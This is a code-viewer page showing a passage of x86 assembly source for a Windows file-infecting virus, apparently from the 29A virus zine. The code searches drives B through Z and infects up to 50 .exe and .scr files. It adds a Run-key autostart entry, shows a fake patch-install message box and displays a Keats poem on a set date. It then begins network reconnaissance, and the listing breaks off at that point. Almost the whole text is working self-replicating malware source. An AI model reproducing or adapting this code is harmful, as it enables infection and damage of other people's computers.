📄 29a-7.013
字号:
mov esi, [esi+16]
add esi, eax
rep lodsd
; create the string "kernel32.dll" on the stack
push 0
push dword ptr 'lld.'
push dword ptr '23le'
push dword ptr 'nrek'
; call GetModuleHandleA to retrieve the address of the kernel32.dll
push esp
call eax
mov [ebp+lpKernel32], eax ; save the kernel32 address
; get the address of the GetProcAddress API function
mov ebx, [eax+3ch]
add ebx, eax
mov ebx, [ebx+120] ; get the export table VA
add ebx, eax
mov esi, [ebx+28] ; get the VA of the address table
add esi, eax
mov edi, [ebx+32] ; get the VA of the name table
add edi, eax
mov ecx, [ebx+36] ; get the VA of the ordinal table
add ecx, eax
findGetProcAddress:
add ecx, 2 ; next ordinal
add edi, 4 ; next name
mov edx, [edi]
add edx, eax
cmp dword ptr [edx], 'PteG'
jne findGetProcAddress
cmp dword ptr [edx+4], 'Acor' ; GetProcAddress?
jne findGetProcAddress
mov cx, [ecx]
and ecx, 0FFFFh
add ecx, [ebx+16] ; add ordinal base
rep lodsd ; get the VA address corrasponding to the ordinal
add eax, [ebp+lpKernel32]
mov [ebp+GetProcAddress], eax
; get the address of the LoadLibraryA API function
pushptr szLoadLibraryA
pushval lpKernel32
ApiCall GetProcAddress
mov [ebp+LoadLibraryA], eax
; load the Windows 9x API functions
lea eax, [ebp+API_Imports_9x]
call LoadImports
cmp eax, -1
je apiLoadError
; create a thread to execute the rest of the code
pushptr hThread
push 0
push ebp ; pass the delta pointer to the thread
pushptr background
push 0
push 0
ApiCall CreateThread
; if /iKX is present in the command line then loop until the thread closes
ApiCall GetCommandLineA
mov ecx, 256
parseCommandLine:
cmp dword ptr [eax], 'XKi/'
je wait
inc eax
loop parseCommandLine
; if this is not the first generation then return control to the host
cmp ebp, 0
jne returnHostControl
; if this is the first generation then loop until the thread closes
wait:
cmp [ebp+dwThreadStatus], EXIT_THREAD
jne wait
push 0
ApiCall ExitProcess
; return control to the host
returnHostControl:
mov eax, [ebp+lpReturnAddress]
add eax, [ebp+lpImageBase]
push eax
ret
; if an api function cannot be loaded then either return control to the host or exit program
apiLoadError:
cmp ebp, 0
jne returnHostControl
push 0
ApiCall ExitProcess
;-------------------------------------------------------------------------------------------------;
; Background Thread. ;
;-------------------------------------------------------------------------------------------------;
background:
mov ebp, [esp+4] ; restore the delta offset
;-------------------------------------------------------------------------------------------------;
; Infect 50 files in drives B-Z, except the CD-ROM drive. ;
;-------------------------------------------------------------------------------------------------;
xor esi, esi ; files infected counter
mov byte ptr [ebp+szDrive], 'A' ; set the drive to start searching at
nextDrive:
inc byte ptr [ebp+szDrive] ; next drive
cmp byte ptr [ebp+szDrive], 'Z'+1 ; all drives searched?
je payload
pushptr szDrive
ApiCall GetDriveTypeA
cmp eax, DRIVE_CDROM ; CD-ROM drive?
je nextDrive
pushptr szDrive
ApiCall SetCurrentDirectoryA ; set the current directory to the root of that drive
cmp eax, 0
je nextDrive
findFiles:
mov edi, esp ; save the stack pointer
push 0BAADF00Dh ; end of files marker
findFirstFile:
pushptr win32FindData
pushptr szSearchString
ApiCall FindFirstFileA ; find the first file
mov [ebp+hFind], eax
checkType:
cmp eax, 0
je downDirectory
cmp byte ptr [ebp+win32FindData.FullFileName], '.'
je findNextFile
cmp [ebp+win32FindData.FileAttributes], 10h
je upDirectory
cmp [ebp+win32FindData.FileAttributes], 30h
je upDirectory
; check the file extension for .exe or .scr
push edi
mov al, '.'
mov ecx, 260
lea edi, [ebp+win32FindData.FullFileName]
repne scasb ; seek to the file extension
mov eax, [edi-1]
pop edi
and eax, 0DFDFDFFFh ; make upper case
cmp eax, 'EXE.' ; executable file?
je infectFile
cmp eax, 'RCS.' ; screen saver?
je infectFile
jmp findNextFile
infectFile:
; check to see if the file is a valid PE executable and is not already infected
push esi
push edi
lea esi, [ebp+win32FindData.FullFileName]
call IsValid
pop edi
pop esi
cmp eax, -1
je findNextFile
; if the executable file is in the system directory then dont infect it
push 256
pushptr szSystemDirectory
ApiCall GetSystemDirectoryA
pushptr szSystemDirectory
ApiCall CharUpperA
pushptr szCurrentDirectory
push 256
ApiCall GetCurrentDirectoryA
pushptr szCurrentDirectory
ApiCall CharUpperA
pushptr szSystemDirectory
pushptr szCurrentDirectory
ApiCall lstrcmpA
cmp eax, 0
je findNextFile
; infect the file
push esi
lea esi, [ebp+win32FindData.FullFileName]
call AttachCode
pop esi
cmp eax, -1
je findNextFile
; increment the file infection counter
inc esi
cmp esi, 50 ; infect 50 files
jne findNextFile
; if 50 files have been infected stop searching
mov esp, edi
jmp searchComplete
findNextFile:
pushptr win32FindData
pushval hFind
ApiCall FindNextFileA ; find the next file
jmp checkType
upDirectory:
pushptr win32FindData.FullFileName
ApiCall SetCurrentDirectoryA
cmp eax, 0
je findNextFile
pushval hFind ; save the find handle
jmp findFirstFile
downDirectory:
pushptr szBackDir
ApiCall SetCurrentDirectoryA
pushval hFind
ApiCall FindClose ; close the find handle
pop [ebp+hFind] ; restore the previous find handle
cmp [ebp+hFind], 0BAADF00Dh ; no more files left to find?
jne findNextFile
mov esp, edi ; restore the stack pointer
jmp nextDrive ; find another drive to infect
searchComplete:
;-------------------------------------------------------------------------------------------------;
; Make it so the last infected file runs on start-up. ;
;-------------------------------------------------------------------------------------------------;
; copy the current path to a buffer
pushptr szCurrentDirectory
pushptr szModuleName
ApiCall lstrcpyA
; append a slash
pushptr szSlash
pushptr szModuleName
ApiCall lstrcatA
; append the executable file name
pushptr win32FindData.FullFileName
pushptr szModuleName
ApiCall lstrcatA
; concat the commandline parameter /iKX to the key value
pushptr szIkxParameter
pushptr szModuleName
ApiCall lstrcatA
; open "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run"
pushptr hKey
pushptr szSubKey
push HKEY_LOCAL_MACHINE
ApiCall RegOpenKeyA
cmp eax, 0
jne exitThread
; get the length of the module name
pushptr szModuleName
ApiCall lstrlenA
; set the start-up program
push eax
pushptr szModuleName
push REG_SZ
push 0
pushptr szValueName
pushval hKey
ApiCall RegSetValueExA
; close the key
pushval hKey
ApiCall RegCloseKey
;-------------------------------------------------------------------------------------------------;
; Display the patch install message if the module name is "patch110.exe" ;
;-------------------------------------------------------------------------------------------------;
; get the path and name of this program
push 256
pushptr szModuleName
push 0
ApiCall GetModuleFileNameA
; seek to a dot
lea edi, [ebp+szModuleName]
mov al, '.'
mov ecx, 256
repne scasb
; seek backwards to a slash
std
mov al, '\'
repne scasb
cld
add edi, 2
; compair the filename to "patch110.exe"
mov ecx, 12
lea esi, [ebp+szPatchName]
rep cmpsb
cmp ecx, 0
jne payload
; display the patch install message
push 0
pushptr szPatchTitle
pushptr szPatchInstall
push 0
ApiCall MessageBoxA
;-------------------------------------------------------------------------------------------------;
; Display a poem by John Keats on the day of his death. ;
;-------------------------------------------------------------------------------------------------;
payload:
; get today's date
pushptr date
ApiCall GetSystemTime
; Feb 23?
cmp [ebp+date.wMonth], 2
jne loadImports
cmp word ptr [ebp+date.wDay], 24
jne loadImports
; display poem
push 0
pushptr szTitle
pushptr szElginMarbles
push 0
ApiCall MessageBoxA
;-------------------------------------------------------------------------------------------------;
; Load the Windows 2k Imports. ;
;-------------------------------------------------------------------------------------------------;
loadImports:
; Windows 2k+ OS?
ApiCall GetVersion
cmp al, 5
jl exitThread
; load the Windows 2k API functions
lea eax, [ebp+API_Imports_2k]
call LoadImports
cmp eax, -1
je exitThread
; internet connection?
push 0
pushptr dwConnectionState
ApiCall InternetGetConnectedState
cmp eax, FALSE
je exitThread
;-------------------------------------------------------------------------------------------------;
; Get the IP address of this computer. ;
;-------------------------------------------------------------------------------------------------;
; initialize winsock
pushptr wsaData
push 0101h
ApiCall WSAStartup
cmp eax, 0
jne exitThread
; get the local host name of this computer
push 132
pushptr szHostName
ApiCall gethostname
cmp eax, 0
jne exitThread
; clear the reverse IP buffer
push 29
pushptr szReverseIP
ApiCall RtlZeroMemory
; get the IP address of the local host
pushptr szHostName
ApiCall gethostbyname
cmp eax, 0
je exitThread
mov eax, [eax+12]
mov eax, [eax]
mov eax, [eax]
;-------------------------------------------------------------------------------------------------;
; Get the host name of this computer. ;
;-------------------------------------------------------------------------------------------------;
getHostName:
bswap eax ; reverse the byte order of the IP
; convert the IP address to a string
push eax
ApiCall inet_ntoa
; copy the reverse IP string to the buffer
push eax
pushptr szReverseIP
ApiCall lstrcpyA
; concat the .in-addr.arpa string
pushptr szArpa
pushptr szReverseIP
ApiCall lstrcatA
; query a DNS server for the host name of this computer
push 0
pushptr lpResults
push 0
push DNS_QUERY_STANDARD
push DNS_TYPE_PTR
pushptr szReverseIP
ApiCall DnsQuery_A
cmp eax, 0
jne exitThread
; was an answer record found?
push size DNS_RECORD
pushval lpResults
pushptr dnsRecordHeader
ApiCall RtlMoveMemory
mov eax, [ebp+dnsRecordHeader.flags]
and al, 00000011b
cmp al, DNSREC_ANSWER
jne exitThread
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -